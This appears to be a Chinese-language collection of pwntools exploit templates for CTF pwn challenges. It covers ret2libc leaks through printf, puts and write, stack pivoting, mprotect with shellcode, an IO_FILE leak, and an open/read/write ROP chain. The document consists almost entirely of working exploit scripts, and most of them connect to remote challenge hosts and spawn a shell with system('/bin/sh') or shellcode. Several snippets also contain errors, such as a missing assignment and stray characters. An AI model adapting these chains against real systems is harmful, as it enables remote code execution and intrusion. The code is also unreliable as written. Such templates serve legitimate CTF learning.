1
2
3
4
5
6
7
不用libcsearcher的时候用

next(libc.search(b'/bin/sh'))

用的时候用

libc.dump('str_bin_sh')

32位printf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *
from LibcSearcher import *
context.log_level="debug"
p = remote('node4.buuoj.cn',28619)
elf=ELF("pwn2_sctf_2016")
libc=ELF("libc-2.23.so")
p.sendlineafter("read?",b'-1')

esi_edi_ebp=0x0804864d
atoi_got=elf.got["atoi"]
printf_plt=elf.plt["printf"]

format_str=0x080486F8
main_addr=elf.sym["main"]

payload=(0x2c+4)*b'a'+p32(printf_plt) +p32(main_addr)  +p32(format_str) +p32(atoi_got)
p.sendlineafter("data!",payload)
atoi_addr=u32(p.recvuntil("\xf7")[-4:])
print(hex(atoi_addr))

libc_base=atoi_addr-libc.sym["atoi"]
system_addr=libc_base+libc.sym["system"]
bin_sh=libc_base+next(libc.search(b'/bin/sh'))
ret=0x08048346
p.sendlineafter("read?",b'-1')
payload_=(0x2c+4)*b'a'+p32(ret)+p32(system_addr)+p32(main_addr)+p32(bin_sh)
p.sendlineafter("data!",payload_)
p.interactive()

64位printf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
from LibcSearcher import *
context.log_level="debug"
p = remote('node4.buuoj.cn',29207)
elf=ELF("babyrop2")
libc=ELF("libc.so.6")
rdi=0x0000000000400733
rsi_r15_ret=0x0000000000400731
printf_plt=elf.plt["printf"]
read_got=elf.got["read"]
format_str=0x0000000000400770
main_addr= elf.sym["main"]
payload(0x20+8)*b'a'+p64(rdi)+p64(format_str)+p64(rsi_r15_ret)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_addr)
p.sendlineafter("What's your name?",payload)
read_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc_base=read_addr-libc.sym["read"]
system_addr=libc_base+libc.sym["system"]
bin_sh_addr=libc_base+next(libc.search(b'/bin/sh'))
payload_=(0x20+8)*b'a'+p64(rdi)+p64(bin_sh_addr)+p64(system_addr)
p.sendlineafter("What's your name?",payload_)
p.interactive()



32位puts

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
from LibcSearcher import *
context(arch='i386', log_level='debug', os='linux')
elf=ELF('Game')
libc=ELF('libc-2.23.so')
elf=ELF('Game')
#p = process('Game')

star=0x080485F4

p= remote("123.60.135.228",2136)
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]


p.sendlineafter("Do you play game?",b'yes')
p.sendlineafter("Do you think playing games will affect your learning?",b'yes')

payload=(0x6c+4)*b'a'+p32(puts_plt)+p32(star)+p32(puts_got)
p.sendlineafter("I think the same as you!",payload)

p.recvline()
puts_addr= u32(p.recvuntil("\xf7")[-4:])
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)

ret=0x080483ea

libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload=(0x6c+4)*b'a'+p32(ret)+p32(system_addr)+p32(star)+p32(binsh_addr)

p.sendlineafter("I think the same as you!",payload)

p.interactive()

64位puts

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import *
from LibcSearcher import *
context.log_level="debug"
p = remote('node4.buuoj.cn',28552)
elf=ELF("bjdctf_2020_babyrop")
main_addr = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret=0x0000000000400733


payload =b'a' * 40 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter("Pull up your sword and tell me u story!",payload)
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
ret_addr=0x00000000004004c9

payload2 = b'a' * 40 +p64(ret_addr)+p64(pop_rdi_ret) + p64(binsh_addr)+p64(system_addr)
p.sendlineafter("Pull up your sword and tell me u story!",payload2)
p.interactive()

64位write

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
from LibcSearcher import *
context.log_level="debug"
p = remote('node4.buuoj.cn',26446)
elf=ELF("level3_x64")
main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']
pop_rdi_ret=0x00000000004006b3
pop_rsi_r15_ret=0x00000000004006b1

payload =b'a' * (0x80+8) + p64(pop_rdi_ret) +p64(1)+p64(pop_rsi_r15_ret)+p64(write_got)+p64(0) +p64(write_plt)+ p64(main_addr)
p.sendlineafter(":",payload)

write_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(write_addr))

libc = ELF("libc-2.23.so")
libc_base = write_addr - libc.sym['write']
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.dump('str_bin_sh')
ret_addr=0x00000000004004c9

payload2 =b'a' * (0x80+8)  +p64(pop_rdi_ret) + p64(binsh_addr)+p64(system_addr)
p.sendlineafter(":",payload2)
p.interactive()

libc不匹配别害怕,这样搞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
from LibcSearcher import *
p = remote("123.60.135.228",2082)
#p= process('./sleep')
context.log_level="debug"
elf=ELF("sleep")
main_addr = 0x0000000004006BD
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gets_plt = 0x000000000400550
pop_rdi_ret=0x0000000000400783

payload =b'a' * (0x70+8) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt)+p64(main_addr)
#attach(p)
p.sendlineafter("Please cherish every second of sleeping time !!!",payload)
#p.interactive()
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = 0x0000000000601040
ret_addr = 0x0000000000400501
#attach(p)
payload2 = b'a' * (0x70+8) +p64(ret_addr)+p64(pop_rdi_ret) + p64(0x000000000601040)+p64(gets_plt)+p64(ret_addr)+p64(main_addr)

p.sendlineafter("Please cherish every second of sleeping time !!!",payload2)
sleep(2)
p.sendline(b'/bin/sh\0')

payload2 = b'a' * (0x70+8) +p64(ret_addr)+p64(pop_rdi_ret) + p64(binsh_addr)+p64(system_addr)
p.sendlineafter("Please cherish every second of sleeping time !!!",payload2)
p.interactive()

栈迁移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
from LibcSearcher import *

context(arch='amd64', log_level='debug', os='linux')
p=remote('123.60.135.228',2095)

sys_addr=0X08048420
leave_ret=0x080484d8
#p=process("./pwn3")
payload=b'a'*40
#attach(p)
p.sendafter("Please input your name:",payload)
ebp= u32(p.recvuntil("\xff")[-4:])-16
print(hex(ebp))

payload2=b'aaaa'+p32(sys_addr)+4*b'a'+p32(ebp-24)+b'/bin/sh'+b'\0'+16*b'a'+p32(ebp-40)+p32(leave_ret)
#                4            8     12             16           23   24       40            44
#        40     36            32    28             24          17    16        0
#attach(p)
p.sendafter("Would you like tell me some message:",payload2)
p.interactive()

利用mprotect

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from pwn import * 

 q = remote('node3.buuoj.cn',29645) 

 \#q = process('./get_started_3dsctf_2016') 

 context.log_level = 'debug' 

 mprotect = 0x0806EC80 

 buf = 0x80ea000 

 pop_3_ret = 0x0804f460 
 read_addr = 0x0806E140 
 payload = 'a'*56 
 payload += p32(mprotect) 
 payload += p32(pop_3_ret) 
 payload += p32(buf) 
 payload += p32(0x1000) 
 payload += p32(0x7) 
 payload += p32(read_addr) 
 payload += p32(buf) 
 payload += p32(0) 
 payload += p32(buf) 
 payload += p32(0x100) 
 q.sendline(payload) 
 sleep(0.1) 


 shellcode = asm(shellcraft.sh(),arch='i386',os='linux') 
 q.sendline(shellcode) 
 sleep(0.1) 
 q.interactive()

IOFILE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# coding=utf-8
from pwn import *
from LibcSearcher import *  
from ctypes import *

# context.log_level = "debug"
context.arch = "amd64"
p = remote('10.52.13.156', 53493)
# p = process('./feedback')

p.sendlineafter("Which list do you want to write?",b"-8")
payload = p64(0xFBAD1800) + p64(0)*3 + b'\x00'
p.sendlineafter(".\n",payload)

p.recvuntil(b'\x00'*8)
libc_base = u64(p.recv(8)) - 0x1ec980
success(hex(libc_base))
flag = libc_base + 0x1f1700

p.sendlineafter("?",b"-11")
p.sendlineafter(".",b'\x68')
p.sendlineafter("?",b"-11")
p.sendlineafter(".",p64(flag))

p.interactive()

srop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
from pwn import *
context.arch='amd64'
context.log_level='debug'
power_rop1=0x0000000000400806
power_rop2=0x00000000004007F0
buf_inp=0x0000000000601039
pop_rbp=0x0000000000400628
bss_addr=0x0000000000601050
def getpower(avg1,avg2,avg3,got):
    payload=p64(power_rop1)+p64(0)+p64(0)+p64(1)+p64(got)+p64(avg1)+p64(avg2)+p64(avg3)
    payload+=p64(power_rop2)+p64(0)*7#为什么是7呢,因为虽然只有6个pop但是上面还有个rsp+8
    return payload

# p=process('./pwn')
p=process('../出题/pwn3/pwn')
# p=remote('162.14.104.152','10017')
# p=remote('nepctf.1cepeak.cn','31507')

elf=ELF('pwn')
libc=ELF('./libc-2.27.so')
syscall_got=elf.got['syscall']
seccomp_init_got=elf.symbols['seccomp_init']
# pause()
# gdb.attach(p,'b *0x000000000040078D')
# pause()


payload=b'flag\x00\x00\x00\x00'*(0x30//8)+p64(0x4007b0)
payload+=getpower(0,0,buf_inp,syscall_got)
# payload+=getpower(buf_inp,0,0,syscall_got)
payload+=getpower(1,1,syscall_got,syscall_got)
payload+=p64(pop_rbp)+p64(buf_inp+8)
# payload+=getpower(0,0,buf_inp+0x10,syscall_got)
# payload+=getpower(1,syscall_got,0x20,syscall_got)
# payload+=p64(elf.symbols['__libc_start_main'])
payload+=p64(0x000000000040076D)
# payload+=getpower(buf_inp,0,2,syscall_got)
# payload+=getpower(3,buf_inp+0x6,0x30,syscall_got)
# payload+=getpower(1,buf_inp+0x6,0x30,syscall_got)
p.sendlineafter(b'!!!\n',payload)
# p.sendlineafter(b'NepCTF2023!\n',payload)
pause()
p.sendline(b'flag\x00\x00\x00\x00'+p64(0x601000))
# pause()

# payload=b'a'*0x30+p64(0x4007b0)
# payload+=getpower(1,1,syscall_got,syscall_got)
# payload+=p64(0x000000000040076D)
# p.sendlineafter(b'NepCTF2023!\n',payload)


# pause()
# # p.sendline(b'')# 控制rax为1
# # # 接收libc
recvaddr=p.recvuntil(b'\x7f')
sysaddr=u64(recvaddr[-6:].ljust(8,b'\x00'))
print(hex(sysaddr))
libcbase=sysaddr-libc.symbols['syscall']
print('libcbase',hex(libcbase))

pop_rax=libcbase+0x000000000001b500
open_addr=libcbase+libc.symbols['open']
read_addr=libcbase+libc.symbols['read']
write_addr=libcbase+libc.symbols['write']
pop_rdi=0x0000000000400813
pop_rdx_rsi=libcbase+0x0000000000130539
pop_rsp=libcbase+0x000000000000396c
pop_rcx=libcbase+0x00000000000e433e

payload=b'flag\x00\x00\x00\x00'*(0x30//8)+p64(0x4007b0)
payload+=p64(pop_rax)+p64(2)+p64(pop_rcx)+p64(0)
# payload+=getpower(buf_inp,0,0,syscall_got)
payload+=flat([pop_rdi,buf_inp,pop_rdx_rsi,0,0,pop_rbp,buf_inp+0x30,sysaddr+23])
payload+=p64(pop_rax)+p64(0)
payload+=flat([pop_rdi,3,pop_rdx_rsi,0x30,buf_inp,sysaddr+23])
payload+=p64(pop_rax)+p64(1)
payload+=flat([pop_rdi,1,pop_rdx_rsi,0x30,buf_inp,sysaddr+23])
# payload+=flat([pop_rdi,buf_inp-1,pop_rdx_rsi,0,0,open_addr])
# payload+=
payload+=p64(0x000000000040076D)
print('len',len(payload))
# p.sendlineafter(b'NepCTF2023!\n',payload)
p.sendlineafter(b'!!!\n',payload)

# # pop_rax=libcbase+0x000000000001b500
# # payload2=

p.interactive()